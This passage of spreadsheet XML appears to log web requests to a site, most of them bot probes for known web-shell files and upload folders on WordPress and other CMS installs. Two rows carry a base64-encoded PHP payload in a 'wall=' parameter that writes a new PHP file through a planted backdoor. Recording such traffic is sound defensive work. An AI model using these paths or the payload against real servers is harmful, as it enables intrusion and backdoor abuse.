        <f t="shared" si="31"/>
        <v>wp-content/plugins/yyobang/mar.php</v>
      </c>
      <c r="E2044" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2045" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2045" s="1">
        <v>45348.795069444444</v>
      </c>
      <c r="B2045" t="s">
        <v>1000</v>
      </c>
      <c r="C2045" t="s">
        <v>997</v>
      </c>
      <c r="D2045" t="str">
        <f t="shared" si="31"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E2045" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2046" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2046" s="1">
        <v>45348.795057870368</v>
      </c>
      <c r="B2046" t="s">
        <v>1000</v>
      </c>
      <c r="C2046" t="s">
        <v>317</v>
      </c>
      <c r="D2046" t="str">
        <f t="shared" si="31"/>
        <v>simple.php</v>
      </c>
      <c r="E2046" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2047" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2047" s="1">
        <v>45348.795046296298</v>
      </c>
      <c r="B2047" t="s">
        <v>1000</v>
      </c>
      <c r="C2047" t="s">
        <v>1005</v>
      </c>
      <c r="D2047" t="str">
        <f t="shared" si="31"/>
        <v>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2NxZ3dpLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</v>
      </c>
      <c r="E2047" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2048" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2048" s="1">
        <v>45348.705150462964</v>
      </c>
      <c r="B2048" t="s">
        <v>1006</v>
      </c>
      <c r="C2048" t="s">
        <v>421</v>
      </c>
      <c r="D2048" t="str">
        <f t="shared" si="31"/>
        <v>wp-admin/meta/</v>
      </c>
      <c r="E2048" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2049" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2049" s="1">
        <v>45348.70511574074</v>
      </c>
      <c r="B2049" t="s">
        <v>1006</v>
      </c>
      <c r="C2049" t="s">
        <v>427</v>
      </c>
      <c r="D2049" t="str">
        <f t="shared" si="31"/>
        <v>components/</v>
      </c>
      <c r="E2049" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2050" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2050" s="1">
        <v>45348.70511574074</v>
      </c>
      <c r="B2050" t="s">
        <v>1006</v>
      </c>
      <c r="C2050" t="s">
        <v>420</v>
      </c>
      <c r="D2050" t="str">
        <f t="shared" ref="D2050:D2113" si="32">MID(C2050,FIND("#", SUBSTITUTE(C2050, "/", "#", 3))+1,LEN(C2050)-FIND("#", SUBSTITUTE(C2050, "/", "#", 3))+1)</f>
        <v>admin/uploads/images/</v>
      </c>
      <c r="E2050" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2051" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2051" s="1">
        <v>45348.705104166664</v>
      </c>
      <c r="B2051" t="s">
        <v>1006</v>
      </c>
      <c r="C2051" t="s">
        <v>426</v>
      </c>
      <c r="D2051" t="str">
        <f t="shared" si="32"/>
        <v>modules/mod_simplefileuploadv1.3/elements/</v>
      </c>
      <c r="E2051" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2052" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2052" s="1">
        <v>45348.705092592594</v>
      </c>
      <c r="B2052" t="s">
        <v>1006</v>
      </c>
      <c r="C2052" t="s">
        <v>424</v>
      </c>
      <c r="D2052" t="str">
        <f t="shared" si="32"/>
        <v>sites/default/files/</v>
      </c>
      <c r="E2052" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2053" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2053" s="1">
        <v>45348.705092592594</v>
      </c>
      <c r="B2053" t="s">
        <v>1006</v>
      </c>
      <c r="C2053" t="s">
        <v>425</v>
      </c>
      <c r="D2053" t="str">
        <f t="shared" si="32"/>
        <v>admin/controller/extension/extension/</v>
      </c>
      <c r="E2053" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2054" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2054" s="1">
        <v>45348.705081018517</v>
      </c>
      <c r="B2054" t="s">
        <v>1006</v>
      </c>
      <c r="C2054" t="s">
        <v>423</v>
      </c>
      <c r="D2054" t="str">
        <f t="shared" si="32"/>
        <v>admin/fckeditor/editor/filemanager/</v>
      </c>
      <c r="E2054" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2055" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2055" s="1">
        <v>45348.705069444448</v>
      </c>
      <c r="B2055" t="s">
        <v>1006</v>
      </c>
      <c r="C2055" t="s">
        <v>422</v>
      </c>
      <c r="D2055" t="str">
        <f t="shared" si="32"/>
        <v>admin/images/slider/</v>
      </c>
      <c r="E2055" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2056" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2056" s="1">
        <v>45348.705034722225</v>
      </c>
      <c r="B2056" t="s">
        <v>1006</v>
      </c>
      <c r="C2056" t="s">
        <v>428</v>
      </c>
      <c r="D2056" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/random_compat/</v>
      </c>
      <c r="E2056" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2057" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2057" s="1">
        <v>45348.705000000002</v>
      </c>
      <c r="B2057" t="s">
        <v>1006</v>
      </c>
      <c r="C2057" t="s">
        <v>430</v>
      </c>
      <c r="D2057" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/Text/Diff/Engine/Engine/</v>
      </c>
      <c r="E2057" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2058" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2058" s="1">
        <v>45348.704988425925</v>
      </c>
      <c r="B2058" t="s">
        <v>1006</v>
      </c>
      <c r="C2058" t="s">
        <v>432</v>
      </c>
      <c r="D2058" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/Requests/Exception/</v>
      </c>
      <c r="E2058" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2059" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2059" s="1">
        <v>45348.704988425925</v>
      </c>
      <c r="B2059" t="s">
        <v>1006</v>
      </c>
      <c r="C2059" t="s">
        <v>429</v>
      </c>
      <c r="D2059" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/Requests/Auth/</v>
      </c>
      <c r="E2059" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2060" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2060" s="1">
        <v>45348.704976851855</v>
      </c>
      <c r="B2060" t="s">
        <v>1006</v>
      </c>
      <c r="C2060" t="s">
        <v>431</v>
      </c>
      <c r="D2060" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/images/wlw/</v>
      </c>
      <c r="E2060" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2061" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2061" s="1">
        <v>45348.704953703702</v>
      </c>
      <c r="B2061" t="s">
        <v>1006</v>
      </c>
      <c r="C2061" t="s">
        <v>433</v>
      </c>
      <c r="D2061" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/Requests/Exception/HTTP/</v>
      </c>
      <c r="E2061" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2062" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2062" s="1">
        <v>45348.704942129632</v>
      </c>
      <c r="B2062" t="s">
        <v>1006</v>
      </c>
      <c r="C2062" t="s">
        <v>434</v>
      </c>
      <c r="D2062" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/Requests/Utility/</v>
      </c>
      <c r="E2062" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2063" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2063" s="1">
        <v>45348.704930555556</v>
      </c>
      <c r="B2063" t="s">
        <v>1006</v>
      </c>
      <c r="C2063" t="s">
        <v>436</v>
      </c>
      <c r="D2063" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/Requests/Transport/</v>
      </c>
      <c r="E2063" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2064" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2064" s="1">
        <v>45348.704918981479</v>
      </c>
      <c r="B2064" t="s">
        <v>1006</v>
      </c>
      <c r="C2064" t="s">
        <v>437</v>
      </c>
      <c r="D2064" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/Requests/Proxy/</v>
      </c>
      <c r="E2064" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2065" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2065" s="1">
        <v>45348.704918981479</v>
      </c>
      <c r="B2065" t="s">
        <v>1006</v>
      </c>
      <c r="C2065" t="s">
        <v>435</v>
      </c>
      <c r="D2065" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/Requests/Response/</v>
      </c>
      <c r="E2065" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2066" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2066" s="1">
        <v>45348.704907407409</v>
      </c>
      <c r="B2066" t="s">
        <v>1006</v>
      </c>
      <c r="C2066" t="s">
        <v>438</v>
      </c>
      <c r="D2066" t="str">
        <f t="shared" si="32"/>
        <v>wp-includes/Requests/Cookie/</v>
      </c>
      <c r="E2066" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2067" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2067" s="1">
        <v>45348.704872685186</v>
      </c>
      <c r="B2067" t="s">
        <v>1006</v>
      </c>
      <c r="C2067" t="s">
        <v>439</v>
      </c>
      <c r="D2067" t="str">
        <f t="shared" si="32"/>
        <v>php/</v>
      </c>
      <c r="E2067" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2068" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2068" s="1">
        <v>45348.704861111109</v>
      </c>
      <c r="B2068" t="s">
        <v>1006</v>
      </c>
      <c r="C2068" t="s">
        <v>441</v>
      </c>
      <c r="D2068" t="str">
        <f t="shared" si="32"/>
        <v>images/stories/</v>
      </c>
      <c r="E2068" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2069" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2069" s="1">
        <v>45348.704861111109</v>
      </c>
      <c r="B2069" t="s">
        <v>1006</v>
      </c>
      <c r="C2069" t="s">
        <v>442</v>
      </c>
      <c r="D2069" t="str">
        <f t="shared" si="32"/>
        <v>plugins/</v>
      </c>
      <c r="E2069" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2070" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2070" s="1">
        <v>45348.70484953704</v>
      </c>
      <c r="B2070" t="s">
        <v>1006</v>
      </c>
      <c r="C2070" t="s">
        <v>448</v>
      </c>
      <c r="D2070" t="str">
        <f t="shared" si="32"/>
        <v>include/</v>
      </c>
      <c r="E2070" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2071" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2071" s="1">
        <v>45348.70484953704</v>
      </c>
      <c r="B2071" t="s">
        <v>1006</v>
      </c>
      <c r="C2071" t="s">
        <v>440</v>
      </c>
      <c r="D2071" t="str">
        <f t="shared" si="32"/>
        <v>Assets/</v>
      </c>
      <c r="E2071" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2072" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2072" s="1">
        <v>45348.704837962963</v>
      </c>
      <c r="B2072" t="s">
        <v>1006</v>
      </c>
      <c r="C2072" t="s">
        <v>446</v>
      </c>
      <c r="D2072" t="str">
        <f t="shared" si="32"/>
        <v>files/</v>
      </c>
      <c r="E2072" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2073" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2073" s="1">
        <v>45348.704837962963</v>
      </c>
      <c r="B2073" t="s">
        <v>1006</v>
      </c>
      <c r="C2073" t="s">
        <v>447</v>
      </c>
      <c r="D2073" t="str">
        <f t="shared" si="32"/>
        <v>admin/editor/</v>
      </c>
      <c r="E2073" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2074" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2074" s="1">
        <v>45348.704826388886</v>
      </c>
      <c r="B2074" t="s">
        <v>1006</v>
      </c>
      <c r="C2074" t="s">
        <v>444</v>
      </c>
      <c r="D2074" t="str">
        <f t="shared" si="32"/>
        <v>template/</v>
      </c>
      <c r="E2074" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2075" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2075" s="1">
        <v>45348.704826388886</v>
      </c>
      <c r="B2075" t="s">
        <v>1006</v>
      </c>
      <c r="C2075" t="s">
        <v>445</v>
      </c>
      <c r="D2075" t="str">
        <f t="shared" si="32"/>
        <v>shop/</v>
      </c>
      <c r="E2075" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2076" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2076" s="1">
        <v>45348.704814814817</v>
      </c>
      <c r="B2076" t="s">
        <v>1006</v>
      </c>
      <c r="C2076" t="s">
        <v>454</v>
      </c>
      <c r="D2076" t="str">
        <f t="shared" si="32"/>
        <v>Site/</v>
      </c>
      <c r="E2076" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2077" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2077" s="1">
        <v>45348.704814814817</v>
      </c>
      <c r="B2077" t="s">
        <v>1006</v>
      </c>
      <c r="C2077" t="s">
        <v>443</v>
      </c>
      <c r="D2077" t="str">
        <f t="shared" si="32"/>
        <v>system/</v>
      </c>
      <c r="E2077" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2078" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2078" s="1">
        <v>45348.70480324074</v>
      </c>
      <c r="B2078" t="s">
        <v>1006</v>
      </c>
      <c r="C2078" t="s">
        <v>452</v>
      </c>
      <c r="D2078" t="str">
        <f t="shared" si="32"/>
        <v>local/</v>
      </c>
      <c r="E2078" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2079" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2079" s="1">
        <v>45348.70480324074</v>
      </c>
      <c r="B2079" t="s">
        <v>1006</v>
      </c>
      <c r="C2079" t="s">
        <v>453</v>
      </c>
      <c r="D2079" t="str">
        <f t="shared" si="32"/>
        <v>modules/</v>
      </c>
      <c r="E2079" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2080" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2080" s="1">
        <v>45348.704791666663</v>
      </c>
      <c r="B2080" t="s">
        <v>1006</v>
      </c>
      <c r="C2080" t="s">
        <v>451</v>
      </c>
      <c r="D2080" t="str">
        <f t="shared" si="32"/>
        <v>vendor/</v>
      </c>
      <c r="E2080" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2081" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2081" s="1">
        <v>45348.704780092594</v>
      </c>
      <c r="B2081" t="s">
        <v>1006</v>
      </c>
      <c r="C2081" t="s">
        <v>449</v>
      </c>
      <c r="D2081" t="str">
        <f t="shared" si="32"/>
        <v>assets/images/</v>
      </c>
      <c r="E2081" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2082" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2082" s="1">
        <v>45348.704780092594</v>
      </c>
      <c r="B2082" t="s">
        <v>1006</v>
      </c>
      <c r="C2082" t="s">
        <v>450</v>
      </c>
      <c r="D2082" t="str">
        <f t="shared" si="32"/>
        <v>Public/</v>
      </c>
      <c r="E2082" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2083" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2083" s="1">
        <v>45348.704768518517</v>
      </c>
      <c r="B2083" t="s">
        <v>1006</v>
      </c>
      <c r="C2083" t="s">
        <v>457</v>
      </c>
      <c r="D2083" t="str">
        <f t="shared" si="32"/>
        <v>vendor/phpunit/phpunit/src/Util/PHP/</v>
      </c>
      <c r="E2083" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2084" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2084" s="1">
        <v>45348.704768518517</v>
      </c>
      <c r="B2084" t="s">
        <v>1006</v>
      </c>
      <c r="C2084" t="s">
        <v>458</v>
      </c>
      <c r="D2084" t="str">
        <f t="shared" si="32"/>
        <v>upload/image/</v>
      </c>
      <c r="E2084" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2085" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2085" s="1">
        <v>45348.704756944448</v>
      </c>
      <c r="B2085" t="s">
        <v>1006</v>
      </c>
      <c r="C2085" t="s">
        <v>455</v>
      </c>
      <c r="D2085" t="str">
        <f t="shared" si="32"/>
        <v>images/</v>
      </c>
      <c r="E2085" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2086" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2086" s="1">
        <v>45348.704756944448</v>
      </c>
      <c r="B2086" t="s">
        <v>1006</v>
      </c>
      <c r="C2086" t="s">
        <v>456</v>
      </c>
      <c r="D2086" t="str">
        <f t="shared" si="32"/>
        <v>assets/</v>
      </c>
      <c r="E2086" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2087" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2087" s="1">
        <v>45348.704733796294</v>
      </c>
      <c r="B2087" t="s">
        <v>1006</v>
      </c>
      <c r="C2087" t="s">
        <v>463</v>
      </c>
      <c r="D2087" t="str">
        <f t="shared" si="32"/>
        <v>admin/uploads/</v>
      </c>
      <c r="E2087" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2088" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2088" s="1">
        <v>45348.704733796294</v>
      </c>
      <c r="B2088" t="s">
        <v>1006</v>
      </c>
      <c r="C2088" t="s">
        <v>464</v>
      </c>
      <c r="D2088" t="str">
        <f t="shared" si="32"/>
        <v>Admin/uploads/</v>
      </c>
      <c r="E2088" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2089" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2089" s="1">
        <v>45348.704722222225</v>
      </c>
      <c r="B2089" t="s">
        <v>1006</v>
      </c>
      <c r="C2089" t="s">
        <v>461</v>
      </c>
      <c r="D2089" t="str">
        <f t="shared" si="32"/>
        <v>uploads/</v>
      </c>
      <c r="E2089" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2090" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2090" s="1">
        <v>45348.704722222225</v>
      </c>
      <c r="B2090" t="s">
        <v>1006</v>
      </c>
      <c r="C2090" t="s">
        <v>462</v>
      </c>
      <c r="D2090" t="str">
        <f t="shared" si="32"/>
        <v>upload/</v>
      </c>
      <c r="E2090" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2091" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2091" s="1">
        <v>45348.704699074071</v>
      </c>
      <c r="B2091" t="s">
        <v>1006</v>
      </c>
      <c r="C2091" t="s">
        <v>459</v>
      </c>
      <c r="D2091" t="str">
        <f t="shared" si="32"/>
        <v>ALFA_DATA/</v>
      </c>
      <c r="E2091" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2092" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2092" s="1">
        <v>45348.704699074071</v>
      </c>
      <c r="B2092" t="s">
        <v>1006</v>
      </c>
      <c r="C2092" t="s">
        <v>460</v>
      </c>
      <c r="D2092" t="str">
        <f t="shared" si="32"/>
        <v>.well-knownold/</v>
      </c>
      <c r="E2092" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2093" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2093" s="1">
        <v>45348.704687500001</v>
      </c>
      <c r="B2093" t="s">
        <v>1006</v>
      </c>
      <c r="C2093" t="s">
        <v>460</v>
      </c>
      <c r="D2093" t="str">
        <f t="shared" si="32"/>
        <v>.well-knownold/</v>
      </c>
      <c r="E2093" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2094" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2094" s="1">
        <v>45348.704675925925</v>
      </c>
      <c r="B2094" t="s">
        <v>1006</v>
      </c>
      <c r="C2094" t="s">
        <v>459</v>
      </c>
      <c r="D2094" t="str">
        <f t="shared" si="32"/>
        <v>ALFA_DATA/</v>
      </c>
      <c r="E2094" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2095" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2095" s="1">
        <v>45348.704652777778</v>
      </c>
      <c r="B2095" t="s">
        <v>1006</v>
      </c>
      <c r="C2095" t="s">
        <v>466</v>
      </c>
      <c r="D2095" t="str">
        <f t="shared" si="32"/>
        <v>wp-content/plugins/ninja-forms/</v>
      </c>
      <c r="E2095" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2096" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2096" s="1">
        <v>45348.704641203702</v>
      </c>
      <c r="B2096" t="s">
        <v>1006</v>
      </c>
      <c r="C2096" t="s">
        <v>467</v>
      </c>
      <c r="D2096" t="str">
        <f t="shared" si="32"/>
        <v>wp-content/mu-plugins-old/</v>
      </c>
      <c r="E2096" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2097" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2097" s="1">
        <v>45348.704641203702</v>
      </c>
      <c r="B2097" t="s">
        <v>1006</v>
      </c>
      <c r="C2097" t="s">
        <v>465</v>
      </c>
      <c r="D2097" t="str">
        <f t="shared" si="32"/>
        <v>wp-content/themes/classic/inc/</v>
      </c>
      <c r="E2097" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2098" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2098" s="1">
        <v>45348.32508101852</v>
      </c>
      <c r="B2098" t="s">
        <v>1007</v>
      </c>
      <c r="C2098" t="s">
        <v>5</v>
      </c>
      <c r="D2098" t="str">
        <f t="shared" si="32"/>
        <v/>
      </c>
      <c r="E2098" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="2099" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2099" s="1">
        <v>45348.012407407405</v>
      </c>
      <c r="B2099" t="s">
        <v>1008</v>
      </c>
      <c r="C2099" t="s">
        <v>470</v>
      </c>
      <c r="D2099" t="str">
        <f t="shared" si="32"/>
        <v>Mshell.php</v>
      </c>
      <c r="E2099" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2100" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2100" s="1">
        <v>45347.98940972222</v>
      </c>
      <c r="B2100" t="s">
        <v>1009</v>
      </c>
      <c r="C2100" t="s">
        <v>566</v>
      </c>
      <c r="D2100" t="str">
        <f t="shared" si="32"/>
        <v>cjfuns.php</v>
      </c>
      <c r="E2100" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2101" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2101" s="1">
        <v>45347.882372685184</v>
      </c>
      <c r="B2101" t="s">
        <v>1009</v>
      </c>
      <c r="C2101" t="s">
        <v>622</v>
      </c>
      <c r="D2101" t="str">
        <f t="shared" si="32"/>
        <v>class.api.php</v>
      </c>
      <c r="E2101" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2102" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2102" s="1">
        <v>45347.882361111115</v>
      </c>
      <c r="B2102" t="s">
        <v>1009</v>
      </c>
      <c r="C2102" t="s">
        <v>992</v>
      </c>
      <c r="D2102" t="str">
        <f t="shared" si="32"/>
        <v>wp-head.php</v>
      </c>
      <c r="E2102" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2103" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2103" s="1">
        <v>45347.882349537038</v>
      </c>
      <c r="B2103" t="s">
        <v>1009</v>
      </c>
      <c r="C2103" t="s">
        <v>993</v>
      </c>
      <c r="D2103" t="str">
        <f t="shared" si="32"/>
        <v>M1.php</v>
      </c>
      <c r="E2103" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2104" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2104" s="1">
        <v>45347.882337962961</v>
      </c>
      <c r="B2104" t="s">
        <v>1009</v>
      </c>
      <c r="C2104" t="s">
        <v>994</v>
      </c>
      <c r="D2104" t="str">
        <f t="shared" si="32"/>
        <v>wp-content/themes/finley/min.php</v>
      </c>
      <c r="E2104" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2105" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2105" s="1">
        <v>45347.882326388892</v>
      </c>
      <c r="B2105" t="s">
        <v>1009</v>
      </c>
      <c r="C2105" t="s">
        <v>996</v>
      </c>
      <c r="D2105" t="str">
        <f t="shared" si="32"/>
        <v>xxl.php</v>
      </c>
      <c r="E2105" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2106" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2106" s="1">
        <v>45347.882326388892</v>
      </c>
      <c r="B2106" t="s">
        <v>1009</v>
      </c>
      <c r="C2106" t="s">
        <v>995</v>
      </c>
      <c r="D2106" t="str">
        <f t="shared" si="32"/>
        <v>fm1.php</v>
      </c>
      <c r="E2106" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2107" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2107" s="1">
        <v>45347.882314814815</v>
      </c>
      <c r="B2107" t="s">
        <v>1009</v>
      </c>
      <c r="C2107" t="s">
        <v>997</v>
      </c>
      <c r="D2107" t="str">
        <f t="shared" si="32"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E2107" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2108" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2108" s="1">
        <v>45347.882303240738</v>
      </c>
      <c r="B2108" t="s">
        <v>1009</v>
      </c>
      <c r="C2108" t="s">
        <v>998</v>
      </c>
      <c r="D2108" t="str">
        <f t="shared" si="32"/>
        <v>wp-content/plugins/yyobang/mar.php</v>
      </c>
      <c r="E2108" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2109" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2109" s="1">
        <v>45347.882291666669</v>
      </c>
      <c r="B2109" t="s">
        <v>1009</v>
      </c>
      <c r="C2109" t="s">
        <v>317</v>
      </c>
      <c r="D2109" t="str">
        <f t="shared" si="32"/>
        <v>simple.php</v>
      </c>
      <c r="E2109" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2110" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2110" s="1">
        <v>45347.882280092592</v>
      </c>
      <c r="B2110" t="s">
        <v>1009</v>
      </c>
      <c r="C2110" t="s">
        <v>1010</v>
      </c>
      <c r="D2110" t="str">
        <f t="shared" si="32"/>
        <v>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3FubXV0LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</v>
      </c>
      <c r="E2110" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2111" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2111" s="1">
        <v>45347.83798611111</v>
      </c>
      <c r="B2111" t="s">
        <v>1009</v>
      </c>
      <c r="C2111" t="s">
        <v>959</v>
      </c>
      <c r="D2111" t="str">
        <f t="shared" si="32"/>
        <v>radio.php</v>
      </c>
      <c r="E2111" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2112" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2112" s="1">
        <v>45347.83797453704</v>
      </c>
      <c r="B2112" t="s">
        <v>1009</v>
      </c>
      <c r="C2112" t="s">
        <v>1002</v>
      </c>
      <c r="D2112" t="str">
        <f t="shared" si="32"/>
        <v>css/</v>
      </c>
      <c r="E2112" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2113" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2113" s="1">
        <v>45347.837962962964</v>
      </c>
      <c r="B2113" t="s">
        <v>1009</v>
      </c>
      <c r="C2113" t="s">
        <v>1003</v>
      </c>
      <c r="D2113" t="str">
        <f t="shared" si="32"/>
        <v>st.php</v>
      </c>
      <c r="E2113" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2114" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2114" s="1">
        <v>45347.837951388887</v>
      </c>
      <c r="B2114" t="s">
        <v>1009</v>
      </c>
      <c r="C2114" t="s">
        <v>623</v>
      </c>
      <c r="D2114" t="str">
        <f t="shared" ref="D2114:D2177" si="33">MID(C2114,FIND("#", SUBSTITUTE(C2114, "/", "#", 3))+1,LEN(C2114)-FIND("#", SUBSTITUTE(C2114, "/", "#", 3))+1)</f>
        <v>cong.php</v>
      </c>
      <c r="E2114" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2115" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2115" s="1">
        <v>45347.835219907407</v>
      </c>
      <c r="B2115" t="s">
        <v>1006</v>
      </c>
      <c r="C2115" t="s">
        <v>470</v>
      </c>
